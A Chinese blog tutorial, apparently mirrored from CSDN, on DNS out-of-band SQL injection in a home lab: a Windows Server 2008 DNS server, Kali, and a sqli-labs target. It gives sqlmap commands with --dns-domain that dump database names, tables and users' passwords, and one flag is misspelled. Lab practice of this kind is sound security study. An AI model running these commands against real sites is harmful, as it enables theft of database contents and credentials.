码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • sqlmap结合dnslog外带注入


    目录

    📓前言

    📓操作步骤

    1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置

    2.环境准备

    2.1Windows server2008 

    2.1.1搭建dns服务器

    2.2测试

    2.2.1设置靶机的网络的dns为server2008

    2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 

    2.2.3server2008中创建转发器

    2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况

    2.3开始sqlmap使用dnslog外带注入

    2.3.1取库 

    2.3.2取表

    2.3.3取users表的列

    2.3.4取表users数据


    📓前言

    • 在最近学习了sql注入的时间盲注后,感觉使用它效率还是不够快,我们这时就可以使用外带注入了,大致就是自己搭建一个dnslog平台,或者使用一个现成的在线平台,比如ceye,然后sqlmap执行的时候加上--dns-domain=xxxx.com 参数就可以,但是使用平台时你可以通过手工注入后在平台看到回显,下面将演示通过一台Windows server 2008(i192.168.78.169)和kali(192.168.78.156)还有一台win11(192.168.78.175),来实现sqlmap的dns外带注入

    📓操作步骤

    1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置

    1. show variables like '%secure%';
    2. #当secure_file_priv为空,就可以读取磁盘的目录。
    3. #当secure_file_priv为G:\,就可以读取G盘的文件。
    4. #当secure_file_priv为null,load_file就不能加载文件。
    5. phpstudy中在D:\phpstudy_pro\Extensions\MySQL5.7.26下找到my.ini打开添加一条secure_file_priv=""

      

    Phpstudy_pro搭建sqllabs靶场_会伏地的向日葵的博客-CSDN博客这篇博客介绍我在使用小皮桌面系统搭建SQLlabs靶场时遇到的可笑问题(纯属个人菜的原因),主要遇到的问题在数据库连接这里报了许多问题,比如数据库安全性问题,数据库用户创建表时的权限问题,归根结底就是我在搭建网点时自己手动创建了一个只有普通权限的数据库,导致后面出现了许许多多的问题,这里我将介绍一下我的搭建过程。...............https://blog.csdn.net/newlife1441/article/details/125875578?

    2.环境准备

    2.1Windows server2008 

    2.1.1搭建dns服务器

                

    2.2测试

    2.2.1设置靶机的网络的dns为server2008

     

    2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 

    2.2.3server2008中创建转发器

     

    2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况

     

    2.3开始sqlmap使用dnslog外带注入

    2.3.1取库 

    1. #注入查库
    2. sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domaim "hehe.top" --dbs

    2.3.2取表

    1. #获取表
    2. sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" --tables

    2.3.3取users表的列

    1. #查列
    2. sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" --columns

    2.3.4取表users数据

    1. #取列值
    2. sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" -C "username,password" --dump

     

    ​

  • 相关阅读:
    未来已来:云原生时代
    MVVM与Vue响应式的实现
    Composite 组合模式简介与 C# 示例【结构型3】【设计模式来了_8】
    1151 LCA in a Binary Tree
    R语言ggplot2可视化:使用ggpubr包的ggscatter函数可视化散点图、使用get_palette函数基于自定义调色板生成一个k色调色板
    Rider 中C#单元测试
    使用Python的turtle模块绘制花形图案(含详细Python代码与注释)
    java中基本数据类型的最大值最小值理解
    go编译问题收集
    Python 自动化脚本系列:第3集
  • 原文地址:https://blog.csdn.net/newlife1441/article/details/126155540
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号